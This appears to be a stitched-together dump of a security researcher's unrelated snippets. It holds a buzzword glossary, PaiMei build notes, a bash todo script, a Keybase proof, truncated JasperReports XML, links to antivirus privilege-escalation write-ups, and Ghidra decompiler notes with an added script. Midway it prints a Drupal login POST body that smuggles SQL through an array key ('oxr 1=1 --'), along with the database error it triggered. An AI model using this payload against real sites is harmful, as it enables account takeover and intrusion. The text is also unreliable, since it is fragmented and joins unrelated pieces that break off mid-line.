- Anonymous - Script kiddies. Also see: Slacktivism
- Advanced - More advanced than the products the presenter sells
- APT - "Fancy name for shit you have in your network and didn't notice for a while"
- China - Because why not? Also see: Attribution Dice
http://code.google.com/p/paimei/ - As of r253
- You need pydasm, it is included in the libdasm package. v1.5 is fine, you don't want to fight with the bugs of the unstable version - http://code.google.com/p/libdasm/
- PyDasm will cry about MSVC scripts but you don't need those. Install MinGW (with C++ support?) - http://www.mingw.org/
- Add MinGW's bin directory to your path or else it won't find gcc
- Remove the -mno-cygwin parameters from pythonXX\lib\distutils\cygwinccompiler.py, remove the .pyc to recompile
- setup.py build_ext --compiler=mingw32
- setup.py install may fail. Install the lib by copying the .pyd file from the build directory to PythonXX\Lib\site-packages
- You don't need PaiMei's dependencies to use PyDbg, just build and install with setup.py
- Remove the bundled pydasm.pyd from the PaiMei package
#!/bin/bash
# Minimal todo list: every item is an empty file under ~/_todo
# usage: todo <item>       -> add the item
#        todo <item> done  -> remove the item
if [ -n "$1" ]; then
    if [ "$2" = "done" ]; then
        rm -- ~/_todo/"$1"
    else
        touch -- ~/_todo/"$1"
    fi
fi
name[0%20%20oxr%201%3d1%20--%20]=admin&name[0]=admin&pass=S2test&form_build_id=form-sn1hRoa-B1e-GhbPCBRswqRllD0noOdRnJE5iiO53pI&form_id=user_login_block&op=Log+in
<li><em class="placeholder">PDOException</em>: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'oxr 1=1 -- , 'admin' AND status = 1' at line 1: SELECT * FROM {users} WHERE name = :name_0 oxr 1=1 -- , :name_0 AND status = 1; Array
(
    [:name_0 oxr 1=1 -- ] => admin
    [:name_0] => admin
)
I hereby claim:
- I am v-p-b on github.
- I am buherator (https://keybase.io/buherator) on keybase.
- I have a public key whose fingerprint is 1DD5 6AFB 0660 4106 7B70 4F71 B84C 47BD 86EA 1855
To claim this, I am signing this object:
import sys
import struct
"""
From debugger trace to Lighthouse
=================================
Converting debugger trace logs to binary drcov format that is good enough for Lighthouse.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE jasperReport PUBLIC "-//JasperReports//DTD Report Design//EN" "http://jasperreports.sourceforge.net/dtds/jasperreport.dtd">
<jasperReport name="FirstJasper" columnCount="2" pageWidth="595" pageHeight="842" columnWidth="270" columnSpacing="15" leftMargin="20" rightMargin="20" topMargin="30" bottomMargin="30">
    <style name="Arial_Normal" isDefault="true" fontName="Arial" fontSize="8" isBold="false" isItalic="false" isUnderline="false" isStrikeThrough="false" pdfFontName="Helvetica" pdfEncoding="Cp1252" isPdfEmbedded="false"/>
    <style name="Arial_Bold" isDefault="false" fontName="Arial" fontSize="8" isBold="true" isItalic="false" isUnderline="false" isStrikeThrough="false" pdfFontName="Helvetica-Bold" pdfEncoding="Cp1252" isPdfEmbedded="false"/>
    <style name="Arial_Italic" isDefault="false" fontName="Arial" fontSize="8" isBold="false" isItalic="true" isUnderline="false" isStrikeThrough="false" pdfFontName="Helvetica-Oblique" pdfEncoding="Cp1252" isPdfEmbedded="fa
https://seclists.org/fulldisclosure/2019/Aug/1
https://medium.com/tenable-techblog/comodo-from-sandbox-to-system-cve-2019-3969-b6a34cc85e67
https://blog.silentsignal.eu/2019/06/24/self-defenseless-exploring-kasperskys-local-attack-surface/
https://safebreach.com/Post/BitDefender-Antivirus-Free-2020-Privilege-Escalation-to-SYSTEM
https://safebreach.com/Post/Trend-Micro-Password-Manager-Privilege-Escalation-to-SYSTEM
https://safebreach.com/Post/Check-Point-Endpoint-Security-Initial-Client-for-Windows-Privilege-Escalation-to-SYSTEM
http://rce4fun.blogspot.com/2019/08/comodo-antivirus-sandbox-race-condition.html
https://medium.com/bugbountywriteup/5-000-usd-xss-issue-at-avast-desktop-antivirus-for-windows-yes-desktop-1e99375f0968
https://posts.specterops.io/cve-2019-12757-local-privilege-escalation-in-symantec-endpoint-protection-1f7fd5c859c6
https://nafiez.github.io/security/poc/2019/11/22/POC-conference-present.html
My current target uses a deterministic pattern when calling C++ constructors, so I can use the CFG to identify object instantiation. Here are my notes about how to use Ghidra's decompiler to get the sizes of objects to be created:
We can use the parameter of operator_new() to find the size of the objects. Instead of parsing the instructions of the relevant basic blocks (and hoping that we don't run into some unexpected instruction sequences generated by the compiler) we can use the decompiler to get the association between the call to operator_new() and its parameter.
Ghidra/Features/Decompiler/ghidra_scripts/ShowCCallsScript.java contains a nice example of how to use the Decompiler API. First, an instance of DecompInterface must be created, as shown in setUpDecompiler(). Note that this method doesn't call openProgram() on the returned DecompInterface object, which is necessary to run decompilation! The decompileFunction() method works as expected - the returned DecompileResults object con
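The walk described above as an added example (my own Ghidra script, not code from the original notes or from Ghidra's ShowCCallsScript.java): it opens the decompiler on the current program, decompiles every function, and reports the constant first parameter of each P-code CALL whose target looks like operator new. The symbol names accepted by isOperatorNew() are an assumption about how the target's symbols are named; adjust them for your binary.

```java
import ghidra.app.decompiler.DecompInterface;
import ghidra.app.decompiler.DecompileResults;
import ghidra.app.script.GhidraScript;
import ghidra.program.model.listing.Function;
import ghidra.program.model.pcode.HighFunction;
import ghidra.program.model.pcode.PcodeOp;
import ghidra.program.model.pcode.PcodeOpAST;
import ghidra.program.model.pcode.Varnode;
import java.util.Iterator;

// Added example script: list the object sizes passed to operator new.
public class FindOperatorNewSizes extends GhidraScript {

    // Assumption: demangled or raw names used for operator new in the target.
    private static boolean isOperatorNew(String name) {
        return name.equals("operator new") || name.equals("operator.new")
            || name.startsWith("_Znw") || name.startsWith("??2@YAP");
    }

    @Override
    public void run() throws Exception {
        DecompInterface decomp = new DecompInterface();
        // This is the step setUpDecompiler() leaves out: without openProgram()
        // decompileFunction() returns empty results.
        if (!decomp.openProgram(currentProgram)) {
            printerr("decompiler init failed: " + decomp.getLastMessage());
            return;
        }
        try {
            for (Function f : currentProgram.getFunctionManager().getFunctions(true)) {
                if (monitor.isCancelled()) return;
                DecompileResults res = decomp.decompileFunction(f, 60, monitor);
                HighFunction hf = res.decompileCompleted() ? res.getHighFunction() : null;
                if (hf == null) continue;
                Iterator<PcodeOpAST> ops = hf.getPcodeOps();
                while (ops.hasNext()) {
                    PcodeOpAST op = ops.next();
                    // For CALL, input 0 is the target address, input 1 the first argument.
                    if (op.getOpcode() != PcodeOp.CALL || op.getNumInputs() < 2) continue;
                    Function callee = getFunctionAt(op.getInput(0).getAddress());
                    if (callee == null || !isOperatorNew(callee.getName())) continue;
                    Varnode size = op.getInput(1);
                    String where = f.getName() + " @ " + op.getSeqnum().getTarget();
                    if (size.isConstant()) {
                        println(String.format("%s: new(0x%x)", where, size.getOffset()));
                    } else {
                        println(where + ": size not constant after decompilation: " + size);
                    }
                }
            }
        } finally {
            decomp.dispose();
        }
    }
}
```

Run it from the Script Manager; a non-constant size usually means the allocation is an array or the size is computed at runtime, so those call sites need a manual look.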
Install the CodeQL extension and configure the CLI!
This is not strictly mandatory, but you probably want something like this: